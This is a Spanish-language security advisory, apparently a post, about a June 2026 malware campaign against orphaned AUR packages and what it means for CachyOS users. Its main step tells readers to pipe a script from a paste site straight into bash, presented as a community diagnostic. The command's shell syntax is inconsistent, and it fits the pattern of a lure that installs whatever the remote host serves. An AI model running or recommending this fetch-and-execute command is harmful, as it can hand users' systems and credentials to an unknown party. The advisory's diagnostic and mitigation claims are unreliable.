El ataque a la cadena de suministro de AUR (Junio 2026)
El reciente incidente de seguridad reportado entre el 11 y 12 de junio de 2026 expone una campaña coordinada de inyección de malware que afectó a múltiples paquetes huérfanos o de bajo mantenimiento dentro del repositorio comunitario AUR (Arch User Repository). Los atacantes introdujeron commits maliciosos modificando los archivos de configuración (aprovechando los bloqueos de dependencias de Node.js, NPM o Bun) para descargar un capturador de credenciales (infostealer), un keylogger o un rootkit en los sistemas afectados durante el proceso de instalación o actualización.
Impacto real en usuarios de CachyOS
Los repositorios oficiales y principales tanto de Arch Linux como de CachyOS están totalmente limpios. Tu sistema operativo solo corre riesgo si realizaste de forma manual alguna instalación o actualización de paquetes específicos directamente desde el AUR (usando herramientas como paru o yay) o si empleas repositorios automatizados como chaotic-aur en las últimas 72 horas.
Métodos para verificar si tu sistema está infectado
La comunidad de desarrolladores ha estructurado métodos de diagnóstico cruzado para comparar tus paquetes locales frente a las bases de datos de elementos comprometidos.
Uso del script de verificación de la comunidad
El equipo de empaquetado ha distribuido un script de diagnóstico automatizado que rastrea las firmas de instalación recientes. Debido a la sintaxis nativa de Fish en CachyOS, debes estructurar la ejecución de la siguiente manera para que procese correctamente la descarga temporal:
entra primero en fish y luego ejecuta esto:
bash <(curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | psub)Si prefieres realizar una auditoría completa del código fuente del detector de manera local antes de otorgarle permisos de ejecución, puedes revisar el repositorio centralizado de control comunitario en GitHub bajo el proyecto lenucksi/aur-malware-check.
Acciones preventivas y de respuesta
- Congelar actualizaciones externas: Se sugiere suspender por completo las actualizaciones orientadas al repositorio AUR por unos días hasta que los administradores revoquen la totalidad de las cuentas comprometidas y limpien el historial de Git.
- Añadir exclusiones de compilación: Una recomendación efectiva compartida en las listas de correo consiste en editar el archivo de configuración
/etc/pacman.confagregando los entornos de ejecución que aprovechan estos vectores de inyección a la línea de exclusión voluntaria:IgnorePkg = yarn bun pnpm npm nodejs-nopt node-gyp - Protocolo ante un positivo: Si los scripts arrojan la existencia de una herramienta vulnerada, el procedimiento seguro ante la presencia de un infostealer exige desinstalar inmediatamente el paquete, forzar la rotación inmediata de todas tus llaves criptográficas (claves de paso, firmas SSH, tokens de APIs) y proceder a efectuar una reinstalación limpia del sistema para asegurar que no persistan mecanismos de persistencia ocultos en el almacenamiento local.
Revisión de paquetes maliciosos en el repositorio de usuarios
Este video analiza los riesgos estructurales de la cadena de suministro en el AUR y detalla cómo ciertos scripts de instalación pueden ser manipulados para ejecutar software no deseado.
